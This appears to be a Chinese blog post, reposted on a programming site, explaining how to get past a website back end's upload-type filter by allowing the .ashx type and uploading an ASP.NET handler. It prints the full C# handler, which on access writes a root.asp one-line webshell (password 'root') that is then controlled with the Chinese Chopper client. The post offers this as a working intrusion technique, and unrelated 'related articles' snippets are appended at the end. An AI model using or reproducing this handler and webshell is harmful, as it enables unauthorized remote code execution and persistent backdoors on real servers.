2. 程式人生 > >另一種辦法突破上傳型別限制

另一種辦法突破上傳型別限制

阿新 發佈:2019-02-04

發現後臺可以設定上傳型別,但是asp,asa,cer等等都不行,上傳之後就提示下載

嘗試著關閉了下了,還是不行,後來找到了一位前輩寫的文章

過濾了asa,cer,cdx,php,aspx等指令碼型別的上傳情況下新增一個ashx的上傳型別,上傳一個ashx指令碼上去,
指令碼內容如下:

然後訪問上傳後的ashx檔案,就會在同目錄下生成一個root.asp的一句話木馬,然後使用一句話木馬客戶端連線即可。利用方面就大家自由發揮了!


密碼為root,果斷菜刀連之

沒有最牛逼的方法,只有最愛思想的腦子


*****************

指令碼

ashx.txt


<%@ WebHandler Language="C#" class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();

}

public bool IsReusable {
get {
return false;
}
}

}

相關推薦

辦法突破型別限制

發現後臺可以設定上傳型別,但是asp,asa,cer等等都不行,上傳之後就提示下載 嘗試著關閉了下了,還是不行,後來找到了一位前輩寫的文章 過濾了asa,cer,cdx,php,aspx等指令碼型別的上傳情況下新增一個ashx的上傳型別,上傳一個ashx指令碼上去, 指令碼

解決android Button 自帶陰影效果辦法

在Android 5.0以後的版本中,定義一個button時,系統自動會加一個陰影的效果,有的時候這種效果看起來比較好,有的時候不符合UI的設計要求,這時候就需要手動去掉陰影。 方法一: 網上很多文章寫了解決辦法,就是給button加一句話style="?androi

檔案型別限制

一、上傳檔案時,可在input 框中新增 accept 屬性來限制選擇的檔案型別,專案中使用時要限制上傳型別為word,查詢資料發現大部分列舉的型別都只有對doc的限制,而對word2007以上的 docx 型別沒法限制,下面給出方法 docx限制: a

struts2檔案型別限制 之 zip和rar檔案型別

zip檔案firefox : application/octet-streamchrome : application/octet-streamoprea : application/zipIE : application/x-zip-compressedrar檔案firef

Ubuntu18.04圖形介面崩潰無法進入桌面問題解決;cuda-9-0 (>= 9.0.176)的解決辦法

追加:【已解決,有一張顯示卡硬體不穩定】 參考我的最終記錄: 首先說明我的情況: Ubuntu18.04,配置了CUDA9.0,在執行一段時間後,圖形介面突然崩潰,當時正在使用Teamviewer遠端操作Matlab。 報錯主要是“starting nvidia

利用IAT匯出OpenGL函式:OpenGL Loader的實現辦法

利用這種辦法可以用50KB的DLL匯出OpenGL 3.3版本所有Core Profile函式, DLL比GLEW小很多, 根據glcorearb.h自動生成的程式碼與glLoadGen生成的程式碼差不多, 這部分程式碼包含的函式都是空實現,結合__declspec(dllexport,

有關於【該檔案的字元編碼需要在傳輸協議層宣告,或者在檔案中加入一個 BOM(位元組順序標記)】的解決辦法

昨天測試一個介面的時候發現一個異常,瀏覽器訪問一個controller,然後帶了一個JSON格式的引數,然後瀏覽器返回400錯誤,除錯發現下面的錯誤資訊: 純文字檔案的字元編碼未宣告。如果該檔案包含 US-ASCII 範圍之外的字元,該檔案將在某些瀏覽器配置中呈現為亂碼。該

Mybatis啟動報錯: No typehandler found for property xxxx 的可能(由CLOB型別導致的問題)

背景:搭了一個demo專案啟動的時候Mybatis報錯錯誤資訊:Caused by: java.lang.IllegalStateException: No typehandler found for

aspx寫cs後臺程式碼(突破過濾招,利用ashx)

http://www.2cto.com/Article/201302/188962.html 前言:有人已經寫過了,突破上傳過濾,今天我也碰到了。就當記錄一下吧, 正文:有個朋友要我給他檢測一個站點,很久都沒操作,用來練練手把。 用自動掃描指令碼掃描出敏感目錄 in

將資料庫某種型別的欄位更新為型別

有時,我們可能會遇到這樣的情況,當我們資料表的float型別精度不夠時,可能需要把它統一調整成decimal或者money,而這時你一個一個去修改可能會崩潰,因為你無法從幾千張表裡確實找到所有的float型別的欄位,而這時我們就需要自動的,批量的去處理它們。 實現思路:從系統表中查詢所有使用者建立的表,然後查

的SQL註入和DNS結合的技巧

其中 where ets 鏈接 是我 例如 .com bar 導致 這個技巧有些另類,當時某業界大佬提點了一下。當時真的真的沒有理解到那種程度,現在可能也是沒有理解到,但是我會努力。 本文章是理解於:http://netsecurity.51cto.com/art/2015

比較器:Comparator

span 問題 com pre log implement nts face spa package comparatordemo.cn; import java.util.Comparator; /* * 一個對象的初期,並沒有實現comparable 接口,此時

(十)Struts2 文件

web.xml copyfile utils 所有 borde name uri sse exp Struts2 框架為依據“基於表單的HTML文件上傳”所進行的文件處理上傳提供了內置支持。當文件上傳時,它通常會存儲在臨時目錄中,然後Action類應對其進行處理或移動到固定

mysql 中的 not like 簡化方法。

ont pan 簡化 regex regexp from sel span rom 第一種 not like 方法 select * from table where `zongbu` not like ‘%北京%‘ and `zongbu` not like ‘%上海%‘

requestAnimationFrame,Web中寫動畫的選擇

畫的 hat hub settime github 激活 time() inpu on() HTML5/CSS3時代,我們要在web裏做動畫選擇其實已經很多了: 你可以用CSS3的animattion+keyframes; 你也可以用css3的transitio

[Caffe]:關於*** Aborted at 1479432790 (unix time) try "date -d @1479432790" 錯誤的原因

關於 參數 col exce href 次數 表示 ati core dump 問題:設置solver.prototxt時,lr_policy:"step",運行時出現下面問題 *** Aborted at 1479432790 (unix time) try "date

思路比較2個日期是否相等的方式

字符 進行 != 思路 ati 轉換 格式轉換 new imp 我們在應用中經常會遇到2個日期比較是否同一年,或者同一個月或者同一日,等。 常規方式,我們通過逐個年,月,日的比較,才能確定是否是同一年,或同一個月或同一日。 我們換一種思路,把2個日期按同一個日期格式轉換成字

linux安裝oracle的方式

用戶 -1 x86_64 依賴 acl shm cap host 解壓 1.下載依賴包: yum -y install binutils compat-libcap1compat-libstdc++.i686 compat-libstdc++.x86_64 elfuti

JAVA-初步認識-第六章-二維數組-定義方式

包括 [1] 元素 個數 初步 數組 http length nbsp 一. 對於二維數組而言,我們該怎麽獲取它的長度,包括裏面一維數組的長度。 想打印二維數組中角標為1的一維數組的長度。System.out.print(arr[1].length),其實就是元素個數。

python關於Decimal保留小數點後尾數的方法

wix 爸爸 方法 ocs ima log tor iuc pytho l674j3匙貝胃巡腿睹http://jz.docin.com/qdt2460f3la1e強稼空沮磺資http://docstore.docin.com/lfuu925whgvv6炕畢俸既講諉http: